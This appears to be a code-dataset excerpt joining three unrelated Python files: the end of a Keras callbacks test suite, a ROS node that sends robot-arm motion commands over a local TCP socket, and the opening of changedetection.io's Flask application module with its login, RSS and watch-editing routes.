model = Sequential()
model.add(Dense(nb_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(nb_class, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbks = [callbacks.LearningRateScheduler(lambda x: 1. / (1. + x))]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=5)
assert (float(K.get_value(model.optimizer.lr)) - 0.2) < K.epsilon()
def test_ReduceLROnPlateau():
(X_train, y_train), (X_test, y_test) = get_test_data(nb_train=train_samples,
nb_test=test_samples,
input_shape=(input_dim,),
classification=True,
nb_class=nb_class)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
def make_model():
np.random.seed(1337)
model = Sequential()
model.add(Dense(nb_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(nb_class, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer=optimizers.SGD(lr=0.1),
metrics=['accuracy'])
return model
model = make_model()
# This should reduce the LR after the first epoch (due to high epsilon).
cbks = [callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.1, epsilon=10, patience=1, cooldown=5)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=5, verbose=2)
assert np.allclose(float(K.get_value(model.optimizer.lr)), 0.01, atol=K.epsilon())
model = make_model()
cbks = [callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.1, epsilon=0, patience=1, cooldown=5)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=5, verbose=2)
assert np.allclose(float(K.get_value(model.optimizer.lr)), 0.1, atol=K.epsilon())
@pytest.mark.skipif((K._BACKEND != 'tensorflow'),
reason="Requires tensorflow backend")
def test_TensorBoard():
import shutil
import tensorflow as tf
import keras.backend.tensorflow_backend as KTF
old_session = KTF.get_session()
filepath = './logs'
(X_train, y_train), (X_test, y_test) = get_test_data(nb_train=train_samples,
nb_test=test_samples,
input_shape=(input_dim,),
classification=True,
nb_class=nb_class)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
def data_generator(train):
if train:
max_batch_index = len(X_train) // batch_size
else:
max_batch_index = len(X_test) // batch_size
i = 0
while 1:
if train:
yield (X_train[i * batch_size: (i + 1) * batch_size], y_train[i * batch_size: (i + 1) * batch_size])
else:
yield (X_test[i * batch_size: (i + 1) * batch_size], y_test[i * batch_size: (i + 1) * batch_size])
i += 1
i = i % max_batch_index
def data_generator_graph(train):
while 1:
if train:
yield {'X_vars': X_train, 'output': y_train}
else:
yield {'X_vars': X_test, 'output': y_test}
# case 1 Sequential
with tf.Graph().as_default():
session = tf.Session('')
KTF.set_session(session)
model = Sequential()
model.add(Dense(nb_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(nb_class, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
tsb = callbacks.TensorBoard(log_dir=filepath, histogram_freq=1)
cbks = [tsb]
# fit with validation data
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=2)
# fit with validation data and accuracy
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=2)
# fit generator with validation data
model.fit_generator(data_generator(True), len(X_train), nb_epoch=2,
validation_data=(X_test, y_test),
callbacks=cbks)
# fit generator without validation data
model.fit_generator(data_generator(True), len(X_train), nb_epoch=2,
callbacks=cbks)
# fit generator with validation data and accuracy
model.fit_generator(data_generator(True), len(X_train), nb_epoch=2,
validation_data=(X_test, y_test),
callbacks=cbks)
# fit generator without validation data and accuracy
model.fit_generator(data_generator(True), len(X_train), nb_epoch=2,
callbacks=cbks)
assert os.path.exists(filepath)
shutil.rmtree(filepath)
# case 2 Graph
with tf.Graph().as_default():
session = tf.Session('')
KTF.set_session(session)
model = Graph()
model.add_input(name='X_vars', input_shape=(input_dim,))
model.add_node(Dense(nb_hidden, activation="sigmoid"),
name='Dense1', input='X_vars')
model.add_node(Dense(nb_class, activation="softmax"),
name='last_dense',
input='Dense1')
model.add_output(name='output', input='last_dense')
model.compile(optimizer='sgd', loss={'output': 'mse'})
tsb = callbacks.TensorBoard(log_dir=filepath, histogram_freq=1)
cbks = [tsb]
# fit with validation
model.fit({'X_vars': X_train, 'output': y_train},
batch_size=batch_size,
validation_data={'X_vars': X_test, 'output': y_test},
callbacks=cbks, nb_epoch=2)
# fit wo validation
model.fit({'X_vars': X_train, 'output': y_train},
batch_size=batch_size,
callbacks=cbks, nb_epoch=2)
# fit generator with validation
model.fit_generator(data_generator_graph(True), 1000, nb_epoch=2,
validation_data={'X_vars': X_test, 'output': y_test},
callbacks=cbks)
# fit generator wo validation
model.fit_generator(data_generator_graph(True), 1000, nb_epoch=2,
callbacks=cbks)
assert os.path.exists(filepath)
shutil.rmtree(filepath)
KTF.set_session(old_session)
def test_LambdaCallback():
(X_train, y_train), (X_test, y_test) = get_test_data(nb_train=train_samples,
nb_test=test_samples,
input_shape=(input_dim,),
classification=True,
nb_class=nb_class)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(nb_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(nb_class, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
# Start an arbitrary process that should run during model training and be terminated after training has completed.
def f():
while True:
pass
p = multiprocessing.Process(target=f)
p.start()
cleanup_callback = callbacks.LambdaCallback(on_train_end=lambda logs: p.terminate())
cbks = [cleanup_callback]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=5)
p.join()
assert not p.is_alive()
@pytest.mark.skipif((K._BACKEND != 'tensorflow'),
reason="Requires tensorflow backend")
def test_TensorBoard_with_ReduceLROnPlateau():
import shutil
filepath = './logs'
(X_train, y_train), (X_test, y_test) = get_test_data(nb_train=train_samples,
nb_test=test_samples,
input_shape=(input_dim,),
classification=True,
nb_class=nb_class)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = Sequential()
model.add(Dense(nb_hidden, input_dim=input_dim, activation='relu'))
model.add(Dense(nb_class, activation='softmax'))
model.compile(loss='binary_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbks = [
callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.5,
patience=4,
verbose=1),
callbacks.TensorBoard(
log_dir=filepath)]
model.fit(X_train, y_train, batch_size=batch_size,
validation_data=(X_test, y_test), callbacks=cbks, nb_epoch=2)
assert os.path.exists(filepath)
shutil.rmtree(filepath)
if __name__ == '__main__':
pytest.main([__file__])
|
HiwinRA605_socket_ros_test_20190626114758.py
|
#!/usr/bin/env python3
# license removed for brevity
#接收策略端命令 用Socket傳輸至控制端電腦
import socket
##多執行序
import threading
import time
##
import sys
import os
import numpy as np
import rospy
import matplotlib as plot
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import enum
Socket = 0
data = '0' #設定傳輸資料初始值
Arm_feedback = 1 #假設手臂忙碌
state_feedback = 0
NAME = 'socket_server'
client_response = 0 #回傳次數初始值
point_data_flag = False
arm_mode_flag = False
speed_mode_flag = False
Socket_sent_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0,36.8,11.35,-90,0,0)
##------------class socket_cmd---------
class socket_cmd():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
global state_feedback
rospy.wait_for_service('arm_state')
try:
Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
state_feedback = Arm_state_client(Arm_state)
#pos_feedback_times = pos_feedback.response
return state_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##----------socket sent data flag-------------
def socket_client_sent_flag(Sent_flag):
global sent_feedback
rospy.wait_for_service('sent_flag')
try:
Sent_flag_client = rospy.ServiceProxy('sent_flag', sent_flag)
sent_feedback = Sent_flag_client(Sent_flag)
#pos_feedback_times = pos_feedback.response
return sent_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------server 端-------
def point_data(req): ##接收策略端傳送位姿資料
global client_response,point_data_flag
pos.x = '%s'%req.x
pos.y = '%s'%req.y
pos.z = '%s'%req.z
pos.pitch = '%s'%req.pitch
pos.roll = '%s'%req.roll
pos.yaw = '%s'%req.yaw
point_data_flag = True
client_response = client_response + 1
Socket_command()
return(client_response)
##----------Arm Mode-------------###
def Arm_Mode(req): ##接收策略端傳送手臂模式資料
global arm_mode_flag
socket_cmd.action = int('%s'%req.action)
socket_cmd.grip = int('%s'%req.grip)
socket_cmd.ra = int('%s'%req.ra)
socket_cmd.setvel = int('%s'%req.vel)
socket_cmd.setboth = int('%s'%req.both)
arm_mode_flag = True
Socket_command()
return(1)
##-------Arm Speed Mode------------###
def Speed_Mode(req): ##接收策略端傳送手臂模式資料
global speed_mode_flag
socket_cmd.Speedmode = int('%s'%req.Speedmode)
speed_mode_flag = True
Socket_command()
return(1)
# def Grip_Mode(req): ##接收策略端傳送夾爪動作資料
# socket_cmd.grip = int('%s'%req.grip)
# return(1)
def socket_server(): ##創建Server node
rospy.init_node(NAME)
a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
#c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
print ("Ready to connect")
rospy.spin() ## spin one
##------------server 端 end-------
##----------socket 封包傳輸--------------##
##---------------socket 傳輸手臂命令-----------------
def Socket_command():
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------設定手臂速度--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------設定手臂Delay時間--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------設定手臂急速&安全模式--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action= 5 ##切換初始mode狀態
Socket.send(data.encode('utf-8'))#socket傳送for python to translate str
##-----------socket client--------
def socket_client():
global Socket,Arm_feedback,data,Socket_sent_flag
try:
Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(Socket.recv(1024))
#start_input=int(input('開始傳輸請按1,離開請按3 : ')) #輸入開始指令
start_input = 1
if start_input==1:
while 1:
feedback_str = Socket.recv(1024)
#手臂端傳送手臂狀態
if str(feedback_str[2]) == '70':# F 手臂為Ready狀態準備接收下一個運動指令
Arm_feedback = 0
socket_client_arm_state(Arm_feedback)
#print("isbusy false")
if str(feedback_str[2]) == '84':# T 手臂為忙碌狀態無法執行下一個運動指令
Arm_feedback = 1
socket_client_arm_state(Arm_feedback)
#print("isbusy true")
if str(feedback_str[2]) == '54':# 6 策略完成
Arm_feedback = 6
socket_client_arm_state(Arm_feedback)
print("shutdown")
#確認傳送旗標
if str(feedback_str[4]) == '48':#回傳0 false
Socket_sent_flag = False
socket_client_sent_flag(Socket_sent_flag)
if str(feedback_str[4]) == '49':#回傳1 true
Socket_sent_flag = True
socket_client_sent_flag(Socket_sent_flag)
##---------------socket 傳輸手臂命令 end-----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
rospy.on_shutdown(myhook)
break
if start_input == 3:
pass
Socket.close()
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
## 多執行緒
def thread_command():
global arm_mode_flag
if arm_mode_flag == True:
arm_mode_flag = False
Socket_command()
def thread_test():
socket_client()
## 多執行序 end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 5##切換初始mode狀態
t = threading.Thread(target=thread_test)
s = threading.Thread(target=thread_command)
t.start() # 開啟多執行緒
s.start()
socket_server()
t.join()
t.join()
# Ctrl+K Ctrl+C 添加行注释 Add line comment
# Ctrl+K Ctrl+U 删除行注释 Remove line comment
#Ctrl+] / [ 缩进/缩进行 Indent/outdent line
|
__init__.py
|
#!/usr/bin/python3
# @todo logging
# @todo extra options for url like , verify=False etc.
# @todo enable https://urllib3.readthedocs.io/en/latest/user-guide.html#ssl as option?
# @todo option for interval day/6 hour/etc
# @todo on change detected, config for calling some API
# @todo fetch title into json
# https://distill.io/features
# proxy per check
# - flask_cors, itsdangerous,MarkupSafe
import datetime
import os
import queue
import threading
import time
from copy import deepcopy
from threading import Event
import flask_login
import logging
import pytz
import timeago
from feedgen.feed import FeedGenerator
from flask import (
Flask,
abort,
flash,
make_response,
redirect,
render_template,
request,
send_from_directory,
session,
url_for,
)
from flask_login import login_required
from flask_restful import abort, Api
from flask_wtf import CSRFProtect
from changedetectionio import html_tools
from changedetectionio.api import api_v1
__version__ = '0.39.14'
datastore = None
# Local
running_update_threads = []
ticker_thread = None
extra_stylesheets = []
update_q = queue.Queue()
notification_q = queue.Queue()
app = Flask(__name__,
static_url_path="",
static_folder="static",
template_folder="templates")
# Stop browser caching of assets
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0
app.config.exit = Event()
app.config['NEW_VERSION_AVAILABLE'] = False
app.config['LOGIN_DISABLED'] = False
#app.config["EXPLAIN_TEMPLATE_LOADING"] = True
# Disables caching of the templates
app.config['TEMPLATES_AUTO_RELOAD'] = True
csrf = CSRFProtect()
csrf.init_app(app)
notification_debug_log=[]
watch_api = Api(app, decorators=[csrf.exempt])
def init_app_secret(datastore_path):
secret = ""
path = "{}/secret.txt".format(datastore_path)
try:
with open(path, "r") as f:
secret = f.read()
except FileNotFoundError:
import secrets
with open(path, "w") as f:
secret = secrets.token_hex(32)
f.write(secret)
return secret
# We use the whole watch object from the store/JSON so we can see if there's some related status in terms of a thread
# running or something similar.
@app.template_filter('format_last_checked_time')
def _jinja2_filter_datetime(watch_obj, format="%Y-%m-%d %H:%M:%S"):
# Worker thread tells us which UUID it is currently processing.
for t in running_update_threads:
if t.current_uuid == watch_obj['uuid']:
return "Checking now.."
if watch_obj['last_checked'] == 0:
return 'Not yet'
return timeago.format(int(watch_obj['last_checked']), time.time())
# @app.context_processor
# def timeago():
# def _timeago(lower_time, now):
# return timeago.format(lower_time, now)
# return dict(timeago=_timeago)
@app.template_filter('format_timestamp_timeago')
def _jinja2_filter_datetimestamp(timestamp, format="%Y-%m-%d %H:%M:%S"):
return timeago.format(timestamp, time.time())
# return timeago.format(timestamp, time.time())
# return datetime.datetime.utcfromtimestamp(timestamp).strftime(format)
# When nobody is logged in Flask-Login's current_user is set to an AnonymousUser object.
class User(flask_login.UserMixin):
id=None
def set_password(self, password):
return True
def get_user(self, email="defaultuser@changedetection.io"):
return self
def is_authenticated(self):
return True
def is_active(self):
return True
def is_anonymous(self):
return False
def get_id(self):
return str(self.id)
# Compare given password against JSON store or Env var
def check_password(self, password):
import base64
import hashlib
# Can be stored in env (for deployments) or in the general configs
raw_salt_pass = os.getenv("SALTED_PASS", False)
if not raw_salt_pass:
raw_salt_pass = datastore.data['settings']['application']['password']
raw_salt_pass = base64.b64decode(raw_salt_pass)
salt_from_storage = raw_salt_pass[:32] # 32 is the length of the salt
# Use the exact same setup you used to generate the key, but this time put in the password to check
new_key = hashlib.pbkdf2_hmac(
'sha256',
password.encode('utf-8'), # Convert the password to bytes
salt_from_storage,
100000
)
new_key = salt_from_storage + new_key
return new_key == raw_salt_pass
pass
def changedetection_app(config=None, datastore_o=None):
global datastore
datastore = datastore_o
# so far just for read-only via tests, but this will be moved eventually to be the main source
# (instead of the global var)
app.config['DATASTORE']=datastore_o
#app.config.update(config or {})
login_manager = flask_login.LoginManager(app)
login_manager.login_view = 'login'
app.secret_key = init_app_secret(config['datastore_path'])
watch_api.add_resource(api_v1.WatchSingleHistory,
'/api/v1/watch/<string:uuid>/history/<string:timestamp>',
resource_class_kwargs={'datastore': datastore, 'update_q': update_q})
watch_api.add_resource(api_v1.WatchHistory,
'/api/v1/watch/<string:uuid>/history',
resource_class_kwargs={'datastore': datastore})
watch_api.add_resource(api_v1.CreateWatch, '/api/v1/watch',
resource_class_kwargs={'datastore': datastore, 'update_q': update_q})
watch_api.add_resource(api_v1.Watch, '/api/v1/watch/<string:uuid>',
resource_class_kwargs={'datastore': datastore, 'update_q': update_q})
# Setup cors headers to allow all domains
# https://flask-cors.readthedocs.io/en/latest/
# CORS(app)
@login_manager.user_loader
def user_loader(email):
user = User()
user.get_user(email)
return user
@login_manager.unauthorized_handler
def unauthorized_handler():
# @todo validate its a URL of this host and use that
return redirect(url_for('login', next=url_for('index')))
@app.route('/logout')
def logout():
flask_login.logout_user()
return redirect(url_for('index'))
# https://github.com/pallets/flask/blob/93dd1709d05a1cf0e886df6223377bdab3b077fb/examples/tutorial/flaskr/__init__.py#L39
# You can divide up the stuff like this
@app.route('/login', methods=['GET', 'POST'])
def login():
if not datastore.data['settings']['application']['password'] and not os.getenv("SALTED_PASS", False):
flash("Login not required, no password enabled.", "notice")
return redirect(url_for('index'))
if request.method == 'GET':
if flask_login.current_user.is_authenticated:
flash("Already logged in")
return redirect(url_for("index"))
output = render_template("login.html")
return output
user = User()
user.id = "defaultuser@changedetection.io"
password = request.form.get('password')
if (user.check_password(password)):
flask_login.login_user(user, remember=True)
# For now there's nothing else interesting here other than the index/list page
# It's more reliable and safe to ignore the 'next' redirect
# When we used...
# next = request.args.get('next')
# return redirect(next or url_for('index'))
# We would sometimes get login loop errors on sites hosted in sub-paths
# note for the future:
# if not is_safe_url(next):
# return flask.abort(400)
return redirect(url_for('index'))
else:
flash('Incorrect password', 'error')
return redirect(url_for('login'))
@app.before_request
def do_something_whenever_a_request_comes_in():
# Disable password login if there is not one set
# (No password in settings or env var)
app.config['LOGIN_DISABLED'] = datastore.data['settings']['application']['password'] == False and os.getenv("SALTED_PASS", False) == False
# Set the auth cookie path if we're running as X-settings/X-Forwarded-Prefix
if os.getenv('USE_X_SETTINGS') and 'X-Forwarded-Prefix' in request.headers:
app.config['REMEMBER_COOKIE_PATH'] = request.headers['X-Forwarded-Prefix']
app.config['SESSION_COOKIE_PATH'] = request.headers['X-Forwarded-Prefix']
# For the RSS path, allow access via a token
if request.path == '/rss' and request.args.get('token'):
app_rss_token = datastore.data['settings']['application']['rss_access_token']
rss_url_token = request.args.get('token')
if app_rss_token == rss_url_token:
app.config['LOGIN_DISABLED'] = True
@app.route("/rss", methods=['GET'])
@login_required
def rss():
from . import diff
limit_tag = request.args.get('tag')
# Sort by last_changed and add the uuid which is usually the key..
sorted_watches = []
# @todo needs a .itemsWithTag() or something
for uuid, watch in datastore.data['watching'].items():
if limit_tag != None:
# Support for comma separated list of tags.
for tag_in_watch in watch['tag'].split(','):
tag_in_watch = tag_in_watch.strip()
if tag_in_watch == limit_tag:
watch['uuid'] = uuid
sorted_watches.append(watch)
else:
watch['uuid'] = uuid
sorted_watches.append(watch)
sorted_watches.sort(key=lambda x: x['last_changed'], reverse=True)
fg = FeedGenerator()
fg.title('changedetection.io')
fg.description('Feed description')
fg.link(href='https://changedetection.io')
for watch in sorted_watches:
dates = list(watch.history.keys())
# Re #521 - Don't bother processing this one if theres less than 2 snapshots, means we never had a change detected.
if len(dates) < 2:
continue
prev_fname = watch.history[dates[-2]]
if not watch.viewed:
# Re #239 - GUID needs to be individual for each event
# @todo In the future make this a configurable link back (see work on BASE_URL https://github.com/dgtlmoon/changedetection.io/pull/228)
guid = "{}/{}".format(watch['uuid'], watch['last_changed'])
fe = fg.add_entry()
# Include a link to the diff page, they will have to login here to see if password protection is enabled.
# Description is the page you watch, link takes you to the diff JS UI page
base_url = datastore.data['settings']['application']['base_url']
if base_url == '':
base_url = "<base-url-env-var-not-set>"
diff_link = {'href': "{}{}".format(base_url, url_for('diff_history_page', uuid=watch['uuid']))}
fe.link(link=diff_link)
# @todo watch should be a getter - watch.get('title') (internally if URL else..)
watch_title = watch.get('title') if watch.get('title') else watch.get('url')
fe.title(title=watch_title)
latest_fname = watch.history[dates[-1]]
html_diff = diff.render_diff(prev_fname, latest_fname, include_equal=False, line_feed_sep="</br>")
fe.content(content="<html><body><h4>{}</h4>{}</body></html>".format(watch_title, html_diff),
type='CDATA')
fe.guid(guid, permalink=False)
dt = datetime.datetime.fromtimestamp(int(watch.newest_history_key))
dt = dt.replace(tzinfo=pytz.UTC)
fe.pubDate(dt)
response = make_response(fg.rss_str())
response.headers.set('Content-Type', 'application/rss+xml')
return response
@app.route("/", methods=['GET'])
@login_required
def index():
from changedetectionio import forms
limit_tag = request.args.get('tag')
pause_uuid = request.args.get('pause')
# Redirect for the old rss path which used the /?rss=true
if request.args.get('rss'):
return redirect(url_for('rss', tag=limit_tag))
if pause_uuid:
try:
datastore.data['watching'][pause_uuid]['paused'] ^= True
datastore.needs_write = True
return redirect(url_for('index', tag = limit_tag))
except KeyError:
pass
# Sort by last_changed and add the uuid which is usually the key..
sorted_watches = []
for uuid, watch in datastore.data['watching'].items():
if limit_tag != None:
# Support for comma separated list of tags.
if watch['tag'] is None:
continue
for tag_in_watch in watch['tag'].split(','):
tag_in_watch = tag_in_watch.strip()
if tag_in_watch == limit_tag:
watch['uuid'] = uuid
sorted_watches.append(watch)
else:
watch['uuid'] = uuid
sorted_watches.append(watch)
sorted_watches.sort(key=lambda x: x['last_changed'], reverse=True)
existing_tags = datastore.get_all_tags()
form = forms.quickWatchForm(request.form)
output = render_template("watch-overview.html",
form=form,
watches=sorted_watches,
tags=existing_tags,
active_tag=limit_tag,
app_rss_token=datastore.data['settings']['application']['rss_access_token'],
has_unviewed=datastore.has_unviewed,
# Don't link to hosting when we're on the hosting environment
hosted_sticky=os.getenv("SALTED_PASS", False) == False,
guid=datastore.data['app_guid'],
queued_uuids=update_q.queue)
if session.get('share-link'):
del(session['share-link'])
return output
# AJAX endpoint for sending a test
@app.route("/notification/send-test", methods=['POST'])
@login_required
def ajax_callback_send_notification_test():
import apprise
apobj = apprise.Apprise()
# validate URLS
if not len(request.form['notification_urls'].strip()):
return make_response({'error': 'No Notification URLs set'}, 400)
for server_url in request.form['notification_urls'].splitlines():
if len(server_url.strip()):
if not apobj.add(server_url):
message = '{} is not a valid AppRise URL.'.format(server_url)
return make_response({'error': message}, 400)
try:
n_object = {'watch_url': request.form['window_url'],
'notification_urls': request.form['notification_urls'].splitlines(),
'notification_title': request.form['notification_title'].strip(),
'notification_body': request.form['notification_body'].strip(),
'notification_format': request.form['notification_format'].strip()
}
notification_q.put(n_object)
except Exception as e:
return make_response({'error': str(e)}, 400)
return 'OK'
@app.route("/scrub/<string:uuid>", methods=['GET'])
@login_required
def scrub_watch(uuid):
try:
datastore.scrub_watch(uuid)
except KeyError:
flash('Watch not found', 'error')
else:
flash("Scrubbed watch {}".format(uuid))
return redirect(url_for('index'))
@app.route("/scrub", methods=['GET', 'POST'])
@login_required
def scrub_page():
if request.method == 'POST':
confirmtext = request.form.get('confirmtext')
if confirmtext == 'scrub':
changes_removed = 0
for uuid in datastore.data['watching'].keys():
datastore.scrub_watch(uuid)
flash("Cleared all snapshot history")
else:
flash('Incorrect confirmation text.', 'error')
return redirect(url_for('index'))
output = render_template("scrub.html")
return output
# If they edited an existing watch, we need to know to reset the current/previous md5 to include
# the excluded text.
def get_current_checksum_include_ignore_text(uuid):
import hashlib
from changedetectionio import fetch_site_status
# Get the most recent one
newest_history_key = datastore.get_val(uuid, 'newest_history_key')
# 0 means that theres only one, so that there should be no 'unviewed' history available
if newest_history_key == 0:
newest_history_key = list(datastore.data['watching'][uuid].history.keys())[0]
if newest_history_key:
with open(datastore.data['watching'][uuid].history[newest_history_key],
encoding='utf-8') as file:
raw_content = file.read()
handler = fetch_site_status.perform_site_check(datastore=datastore)
stripped_content = html_tools.strip_ignore_text(raw_content,
datastore.data['watching'][uuid]['ignore_text'])
if datastore.data['settings']['application'].get('ignore_whitespace', False):
checksum = hashlib.md5(stripped_content.translate(None, b'\r\n\t ')).hexdigest()
else:
checksum = hashlib.md5(stripped_content).hexdigest()
return checksum
return datastore.data['watching'][uuid]['previous_md5']
@app.route("/edit/<string:uuid>", methods=['GET', 'POST'])
@login_required
# https://stackoverflow.com/questions/42984453/wtforms-populate-form-with-data-if-data-exists
# https://wtforms.readthedocs.io/en/3.0.x/forms/#wtforms.form.Form.populate_obj ?
def edit_page(uuid):
from changedetectionio import forms
using_default_check_time = True
# More for testing, possible to return the first/only
if not datastore.data['watching'].keys():
flash("No watches to edit", "error")
return redirect(url_for('index'))
if uuid == 'first':
uuid = list(datastore.data['watching'].keys()).pop()
if not uuid in datastore.data['watching']:
flash("No watch with the UUID %s found." % (uuid), "error")
return redirect(url_for('index'))
# be sure we update with a copy instead of accidently editing the live object by reference
default = deepcopy(datastore.data['watching'][uuid])
# Show system wide default if nothing configured
if datastore.data['watching'][uuid]['fetch_backend'] is None:
default['fetch_backend'] = datastore.data['settings']['application']['fetch_backend']
# Show system wide default if nothing configured
if all(value == 0 or value == None for value in datastore.data['watching'][uuid]['time_between_check'].values()):
default['time_between_check'] = deepcopy(datastore.data['settings']['requests']['time_between_check'])
# Defaults for proxy choice
if datastore.proxy_list is not None: # When enabled
# Radio needs '' not None, or incase that the chosen one no longer exists
if default['proxy'] is None or not any(default['proxy'] in tup for tup in datastore.proxy_list):
default['proxy'] = ''
# proxy_override set to the json/text list of the items
form = forms.watchForm(formdata=request.form if request.method == 'POST' else None,
data=default,
)
if datastore.proxy_list is None:
# @todo - Couldn't get setattr() etc dynamic addition working, so remove it instead
del form.proxy
else:
form.proxy.choices = [('', 'Default')] + datastore.proxy_list
if request.method == 'POST' and form.validate():
extra_update_obj = {}
# Re #110, if they submit the same as the default value, set it to None, so we continue to follow the default
# Assume we use the default value, unless something relevant is different, then use the form value
# values could be None, 0 etc.
# Set to None unless the next for: says that something is different
extra_update_obj['time_between_check'] = dict.fromkeys(form.time_between_check.data)
for k, v in form.time_between_check.data.items():
if v and v != datastore.data['settings']['requests']['time_between_check'][k]:
extra_update_obj['time_between_check'] = form.time_between_check.data
using_default_check_time = False
break
# Use the default if its the same as system wide
if form.fetch_backend.data == datastore.data['settings']['application']['fetch_backend']:
extra_update_obj['fetch_backend'] = None
# Notification URLs
datastore.data['watching'][uuid]['notification_urls'] = form.notification_urls.data
# Ignore text
form_ignore_text = form.ignore_text.data
datastore.data['watching'][uuid]['ignore_text'] = form_ignore_text
# Reset the previous_md5 so we process a new snapshot including stripping ignore text.
if form_ignore_text:
if len(datastore.data['watching'][uuid].history):
extra_update_obj['previous_md5'] = get_current_checksum_include_ignore_text(uuid=uuid)
# Reset the previous_md5 so we process a new snapshot including stripping ignore text.
if form.css_filter.data.strip() != datastore.data['watching'][uuid]['css_filter']:
if len(datastore.data['watching'][uuid].history):
